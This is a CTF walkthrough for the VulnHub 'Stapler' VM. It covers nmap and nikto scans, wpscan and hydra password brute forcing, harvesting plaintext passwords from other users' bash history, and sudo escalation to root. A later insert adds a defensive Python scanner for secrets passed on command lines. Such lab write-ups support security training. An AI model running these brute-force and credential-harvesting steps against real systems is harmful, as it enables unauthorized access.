He110 w0rld! Today I will be sharing a guide to completing the Stapler VM hosted on VulnHub. This VM was created by the one and only @g0tmi1k.
As always there will be spoilers within this guide, so use as little or as much as you need.
***With all these VMs there are always multiple ways to r00t the box***
Name: Stapler | IP: DHCP
Date: 2016-June-08 | Goal: Get Root!
Author: g0tmi1k | Difficultly: ??? ;)

+ Average beginner/intermediate VM, only a few twists
+ May find it easy/hard (depends on YOUR background)
+ ...also which way you attack the box

+ It SHOULD work on both VMware and Virtualbox
+ REBOOT the VM if you CHANGE network modes
+ Fusion users, you'll need to retry when importing

+ There are multiple methods to-do this machine
+ At least two (2) paths to get a limited shell
+ At least three (3) ways to get a root access

+ Made for BsidesLondon 2016
+ Slides: https://download.vulnhub.com/media/stapler/

+ Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman
+ ...and shout-outs to the VulnHub-CTF Team =)

--[[~~Enjoy. Have fun. Happy Hacking.~~]]--
Let's reap some bytes...
Discovery
Command: netdiscover -r 192.168.153.0/24
***Please note your IP Range can/will differ***
Currently scanning: 192.168.153.0/24   |   Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
IP               At MAC Address      Count  Len  MAC Vendor / Hostname
192.168.153.1    00:50:56:c0:00:01   1      60   VMware, Inc.
192.168.153.142  00:0c:29:8b:3c:14   1      60   VMware, Inc.
192.168.153.254  00:50:56:f8:e3:7b   1      60   VMware, Inc.
Enumeration
Command: nmap -sS -Pn -p1-65535 192.168.153.142
root@lulb0x:~# nmap -sS -Pn -p1-65535 192.168.153.142
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-24 15:26 EDT
Nmap scan report for Red.Initech (192.168.153.142)
Host is up (0.00023s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 00:0C:29:8B:3C:14 (VMware)
Lots of fun stuff to play with.
Service Exploration
FTP
root@lulb0x:~# ftp 192.168.153.142
Connected to 192.168.153.142.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.153.142:root): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03 23:06 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (50.0442 kB/s)
ftp> exit
Interesting, a potential user: Harry. I will add this to the list of potential users.
Reading our loot (note) reveals...
root@lulb0x:~# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
Once again, more potential users: elly and john.
With nothing more to see or do in the FTP realm at this time, we move on.
SSH
Usually there is nothing to gain from trying to SSH at this point, but I always connect just to see whether the banner (assuming there is one) has any hints that we can put away for later.
root@lulb0x:~# ssh 192.168.153.142
-----------------------------------------------------------------
~          Barry, don't forget to put a message here          ~
-----------------------------------------------------------------
root@192.168.153.142's password:
Sweet, another potential user: barry. At this point we could try to brute force the SSH service, but I will hold off a bit longer just in case. No need to make more noise at this point.
666 - The port of the beast!!!
root@lulb0x:~# nc 192.168.153.142 666
PK d��Hp� ��, 2
message2.jpgUT +�QWJ�QWux
� �z
T ���P���A@� �UT�T � 2>��RDK �Jj�"DL[E�
0<Ĵ�ʮn���V �W�H �
Brutal... Looks like someone wants me to have a file of some sort.
Command: nc 192.168.153.142 666 > Satanic_File
root@lulb0x:~/Documents/Stapler/Satans_Port# file Satanic_File
Satanic_File: Zip archive data, at least v2.0 to extract
So our Satanic_File seems to be a Zip file.
Command: unzip Satanic_File.zip
root@lulb0x:~/Documents/Stapler/Satans_Port# unzip Satanic_File.zip
Archive:  Satanic_File.zip
  inflating: message2.jpg
The unzip reveals a JPG that displays a message.
Great, yet another potential user: scott
Now, I have been burned a couple of times in these VMs by not checking the JPGs for hidden messages, so I always run strings on the images.
Command: strings message2.jpg
JFIF
vPhotoshop 3.0
8BIM
1If you are reading this, you should get a cookie!
If you are reading this you should get a cookie... no thanks, I don't eat cookies, I steal them :) It seems there is nothing else to do with Satan's port, so we move along.
Port 12380
Figuring out what port 12380 contains with netcat was pretty simple.
Interesting: a webpage with 3 more people's names:
dave
tim
zoe
Port 80 /12380 : Http(s?)
Since we know that 12380 turned out to be a website, we can now run nikto and dirb/dirbuster against both ports.
Command: nikto -host 192.168.153.142; dirb http://192.168.153.142
root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142; dirb http://192.168.153.142
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.153.142
+ Target Hostname:    192.168.153.142
+ Target Port:        80
+ Start Time:         2016-06-27 10:56:46 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time:           2016-06-27 10:56:58 (GMT-4) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jun 27 10:56:58 2016
URL_BASE: http://192.168.153.142/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.153.142/ ----
+ http://192.168.153.142/.bashrc (CODE:200|SIZE:3771)
+ http://192.168.153.142/.profile (CODE:200|SIZE:675)
-----------------
END_TIME: Mon Jun 27 10:57:02 2016
DOWNLOADED: 4612 - FOUND: 2
We can see that it initially finds 2 files: .bashrc and .profile.
Looking quickly, I didn't find anything of earth-shattering awesome sauce, so I moved on to 12380.
Command: nikto -host 192.168.153.142 -port 12380;
root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142 -port 12380;
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.153.142
+ Target Hostname:    192.168.153.142
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2016-06-27 11:01:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.153.142' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2016-06-27 11:02:40 (GMT-4) (100 seconds)
So we get an SSL cert, and from it another user: pam.
Also, we get 2 folders from the robots.txt file:
admin112233
blogblog (potentially a CMS). Nice.
Navigating to https://192.168.153.142:12380/admin112233 gives us the following (did you get caught :) )
Moving on...
blogblog reveals itself as a WordPress site. Sweet. If we get a credential, hopefully we can edit a theme and drop a reverse shell or get RCE.
For this next part I am going to use wpscan to find everything of value. (If you are looking for another awesome tutorial, a video one, check out https://7ms.us; Brian does a great job of explaining what flags to use for wpscan. Thanks Brian @7minsec.)
Command: wpscan --url https://192.168.153.142:12380/blogblog/ -e u[1-20] -e a
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: https://192.168.153.142:12380/blogblog/
[+] Started: Mon Jun 27 11:17:31 2016
[!] The WordPress 'https://192.168.153.142:12380/blogblog/readme.html' file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.153.142:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.153.142:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-includes/
[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
[!] 21 vulnerabilities identified from the version number
So we know that it is running version 4.2.1 with 21 vulnerabilities... nice... But I want to see what (if any) users can be found.
[+] Enumerating usernames ...
[+] Identified the following 16 user/s:
+----+---------+-----------------+
| Id | Login   | Name            |
+----+---------+-----------------+
| 1  | john    | John Smith      |
| 2  | elly    | Elly Jones      |
| 3  | peter   | Peter Parker    |
| 4  | barry   | Barry Atkins    |
| 5  | heather | Heather Neville |
| 6  | garry   | garry           |
| 7  | harry   | harry           |
| 8  | scott   | scott           |
| 9  | kathy   | kathy           |
| 10 | tim     | tim             |
| 11 | zoe     | ZOE             |
| 12 | dave    | Dave            |
| 13 | simon   | Simon           |
| 14 | abby    | Abby            |
| 15 | vicki   | Vicki           |
| 16 | pam     | Pam             |
+----+---------+-----------------+
Damn... That's a lot of users, some of which look pretty familiar:
pam
dave
zoe
tim
garry
harry
barry
peter
john
elly
I remember seeing a message for elly stating that there was a payload waiting for her in her FTP account, or something like that. Let's see if wpscan can brute force her password.
Command: wpscan --url https://192.168.153.142:12380/blogblog/ --wordlist /usr/share/wordlists/rockyou_5max.txt --username elly
****NOTE: rockyou_5max.txt is just the rockyou list, but only the words that are 5 chars or fewer****
****NOTE v2.0: I created a brute forcer in Python for finding the password as well; as a codemonkey I feel the need to always try on my own. If anyone wants it, feel free to leave a comment and I can share it with you****
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
[+] [SUCCESS] Login : elly Password : ylle
Brute Forcing 'elly' Time: 00:18:01
+----+-------+------+----------+
| Id | Login | Name | Password |
+----+-------+------+----------+
|    | elly  |      | ylle     |
+----+-------+------+----------+
[+] Finished: Mon Jun 27 11:46:55 2016
[+] Requests Done: 99717
[+] Memory used: 42.395 MB
[+] Elapsed time: 00:18:04
Ooh... elly was cracked with the password ylle.
Let's switch back and try her credentials on the FTP service and see if we get lucky with some password reuse.
root@lulb0x:~/Documents/Stapler# ftp 192.168.153.142
Connected to 192.168.153.142.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.153.142:root): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Bingo... but what can we see?
Command: ls
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    5 0        0            4096 Jun 03 13:51 X11
drwxr-xr-x    3 0        0            4096 Jun 03 13:51 acpi
-rw-r--r--    1 0        0            3028 Apr 20 23:09 adduser.conf
-rw-r--r--    1 0        0              51 Jun 03 19:20 aliases
-rw-r--r--    1 0        0           12288 Jun 03 19:20 aliases.db
drwxr-xr-x    2 0        0            4096 Jun 07 01:57 alternatives
drwxr-xr-x    8 0        0            4096 Jun 03 17:46 apache2
drwxr-xr-x    3 0        0            4096 Jun 03 13:51 apparmor
drwxr-xr-x    9 0        0            4096 Jun 06 23:17 apparmor.d
drwxr-xr-x    3 0        0            4096 Jun 03 13:51 apport
drwxr-xr-x    6 0        0            4096 Jun 03 14:05 apt
-rw-r-----    1 0        1             144 Jan 14 23:35 at.deny
drwxr-xr-x    5 0        0            4096 Jun 03 14:47 authbind
-rw-r--r--    1 0        0            2188 Sep 01  2015 bash.bashrc
drwxr-xr-x    2 0        0            4096 Jun 03 13:52 bash_completion.d
-rw-r--r--    1 0        0             367 Jan 27 15:17 bindresvport.blacklist
drwxr-xr-x    2 0        0            4096 Apr 12 11:30 binfmt.d
drwxr-xr-x    2 0        0            4096 Jun 03 13:51 byobu
drwxr-xr-x    3 0        0            4096 Jun 03 13:51 ca-certificates
-rw-r--r--    1 0        0            7788 Jun 03 13:51 ca-certificates.conf
drwxr-xr-x    2 0        0            4096 Jun 03 13:49 console-setup
drwxr-xr-x    2 0        0            4096 Jun 03 19:13 cron.d
drwxr-xr-x    2 0        0            4096 Jun 03 17:07 cron.daily
drwxr-xr-x    2 0        0            4096 Jun 03 13:49 cron.hourly
drwxr-xr-x    2 0        0            4096 Jun 03 13:49 cron.monthly
drwxr-xr-x    2 0        0            4096 Jun 03 13:51 cron.weekly
-rw-r--r--    1 0        0             722 Apr 05 22:59 crontab
-rw-r--r--    1 0        0              54 Jun 03 13:51 crypttab
drwxr-xr-x    2 0        0            4096 Jun 04 00:02 dbconfig-common
drwxr-xr-x    4 0        0            4096 Jun 03 13:51 dbus-1
-rw-r--r--    1 0        0            2969 Nov 10  2015 debconf.conf
-rw-r--r--    1 0        0              12 Apr 30  2015 debian_version
drwxr-xr-x    3 0        0            4096 Jun 05 23:04 default
-rw-r--r--    1 0        0             604 Jul 02  2015 deluser.conf
drwxr-xr-x    2 0        0            4096 Jun 03 13:49 depmod.d
drwxr-xr-x    4 0        0            4096 Jun 03 13:49 dhcp
-rw-r--r--    1 0        0           26716 Jul 30  2015 dnsmasq.conf
drwxr-xr-x    2 0        0            4096 Jun 03 14:19 dnsmasq.d
drwxr-xr-x    4 0        0            4096 Jun 07 01:57 dpkg
-rw-r--r--    1 0        0              96 Apr 20 23:09 environment
drwxr-xr-x    4 0        0            4096 Jun 03 14:18 fonts
-rw-r--r--    1 0        0             594 Jun 03 13:49 fstab
/etc = lulz. Let's grab the passwd file and see if any of our potential users are actual users.
Command: get passwd
ftp> get passwd
local: passwd remote: passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (2908 bytes).
226 Transfer complete.
2908 bytes received in 0.00 secs (6.6826 MB/s)
Command: cat passwd | grep bash | cut -d':' -f1
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
MFrei
SStroud
JKanode
CJoo
Drew
jess
SHAY
mel
zoe
NATHAN
elly
Okay, time to let hydra do what it does best.
Command: hydra -L Actual_Users -P /usr/share/wordlists/rockyou.txt ssh://192.168.153.142 -t 15 -u
root@lulb0x:~/Documents/Stapler# hydra -L Actual_Users -P /usr/share/wordlists/rockyou.txt ssh://192.168.153.142 -t 15 -u
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-27 13:19:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 15 tasks per 1 server, overall 64 tasks, 272543581 login tries (l:19/p:14344399), ~283899 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 162.00 tries/min, 162 tries in 00:01h, 272543419 todo in 28039:27h, 15 active
[22][ssh] host: 192.168.153.142   login: Drew   password: qwerty
[STATUS] 203.67 tries/min, 611 tries in 00:03h, 272542970 todo in 22303:02h, 15 active
[22][ssh] host: 192.168.153.142   login: JBare   password: cookie
Using the credentials JBare:cookie, and trying to cut some corners since it seems that all the home folders are world-readable...
Command: cat */.bash_history
JBare@red:/home$ cat */.bash_history
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
top
ps aux
exit
exit
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
whoami
exit
exit
exit
exit
exit
cat: peter/.bash_history: Permission denied
exit
exit
exit
exit
exit
exit
id
top
exit
Nice... 2 more sets of credentials:
JKanode:thisimypassword
peter:JZQuyIN5
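The sshpass lines above are exactly what a credential-hygiene audit should catch: a password passed as an argument ends up in the shell history and, while the command runs, in the process list that `ps aux` shows every local user. As an added defender-side example (not part of the original walkthrough, and not the VM's own data), here is a small Python scanner that flags such lines in history files or `ps -ef` output and reports them with the secret redacted. The pattern set and the sample lines are constructed for this example.

```python
import re

# Patterns for secrets passed as command-line arguments. Each entry is
# (label, regex) where group 1 captures the secret. This set is an assumption
# for the example; extend it with the tools used in your environment.
SECRET_PATTERNS = [
    ("sshpass -p", re.compile(r"\bsshpass\s+-p\s*(\S+)")),
    ("mysql -p", re.compile(r"\bmysql\b.*?\s-p(\S+)")),
    ("--password=", re.compile(r"--password=(\S+)")),
    ("curl -u user:pass", re.compile(r"\bcurl\b.*?\s-u\s*[^\s:]+:(\S+)")),
]

def find_cli_secrets(lines, source="bash_history"):
    """Scan command lines (shell history or `ps -ef` output) for inline secrets.

    Returns one dict per hit: where it was found, which pattern matched, and
    the command with the secret redacted so the report itself does not leak it.
    """
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        line = raw.strip()
        if not line:
            continue
        for label, pattern in SECRET_PATTERNS:
            match = pattern.search(line)
            if not match:
                continue
            secret = match.group(1)
            findings.append({
                "source": source,
                "line": line_no,
                "pattern": label,
                "command": line.replace(secret, "<redacted>"),
            })
            break  # one finding per line is enough for triage
    return findings

def summarize(findings):
    """Group findings per source for a quick audit report."""
    per_source = {}
    for f in findings:
        per_source.setdefault(f["source"], []).append(f)
    return per_source

# Constructed sample history modelled on the lines in the walkthrough.
# Placeholder secrets, not the VM's real credentials.
SAMPLE_HISTORY = [
    "exit",
    "ps aux",
    "sshpass -p ExamplePass1 ssh alice@localhost",
    "apt-get install sshpass",
    "mysql -u root -pExampleDbPass wordpress",
    "mysql -u root -p",  # interactive prompt: no secret on the line
    "git push --password=ExampleToken origin main",
    "curl -u bob:ExampleApiKey https://intranet.example/api",
]

# Constructed process listing: the same sshpass invocation is visible to
# every local user while it runs, so the process table is the second place to look.
SAMPLE_PS = [
    "UID  PID  PPID  C STIME TTY   TIME     CMD",
    "bob  3747 3701  0 13:20 pts/1 00:00:00 sshpass -p ExamplePass1 ssh alice@localhost",
]

if __name__ == "__main__":
    hits = find_cli_secrets(SAMPLE_HISTORY) + find_cli_secrets(SAMPLE_PS, source="ps -ef")
    for src, items in summarize(hits).items():
        print(f"[{src}] {len(items)} command line(s) carry a secret")
        for f in items:
            print(f"  line {f['line']}: ({f['pattern']}) {f['command']}")
```

On a real host, feed it `~/.bash_history` for each account and the output of `ps -eo args` instead of the constructed lists.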
I am going to try peter's credentials first because he has a stronger password... I would like to believe he is a sudoer at a minimum.
Jackpot... peter has full root access. With a sudo su we get root and claim our flag.
I would like to thank G0tMi1k and Vulnhub and all the testers. This was a very fun VM.